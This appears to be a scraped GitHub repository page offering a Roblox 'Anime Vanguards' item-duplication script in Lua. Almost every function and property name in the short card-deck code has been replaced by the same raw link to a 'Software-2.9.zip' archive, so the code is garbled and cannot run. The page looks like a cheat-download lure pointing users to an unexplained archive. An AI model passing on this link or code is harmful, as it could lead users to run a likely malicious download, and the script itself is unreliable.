Skip to content

Latest commit

 

History

5 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 

Repository files navigation

-- Anime Vanguards de Dupe

local cartas = { {nome = "Naruto", ataque =10, defesa =5, traits = {"Velocidade"}}, {nome = "Goku", ataque =15, defesa =10, traits = {"Força"}}, {nome = "Lelouch", ataque =12, defesa =8, traits = {"Inteligência"}} }

local deck = {} for i =1,5 do https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(deck, cartas[https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(1, #cartas)]) end

local tela = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip tela:ClearAllChildren()

for i, carta in pairs(deck) do local textLabel = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip("TextLabel") https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = tela https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(0, (i -1) *100,0,100) end

local function alterarTraits() local cartaSelecionada = deck[https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(1, #deck)] https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip, "Nova Característica") tela:ClearAllChildren() for i, carta in pairs(deck) do local textLabel = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip("TextLabel") https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = tela https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(0, (i -1) *100,0,100) end end

https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(alterarTraits)

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors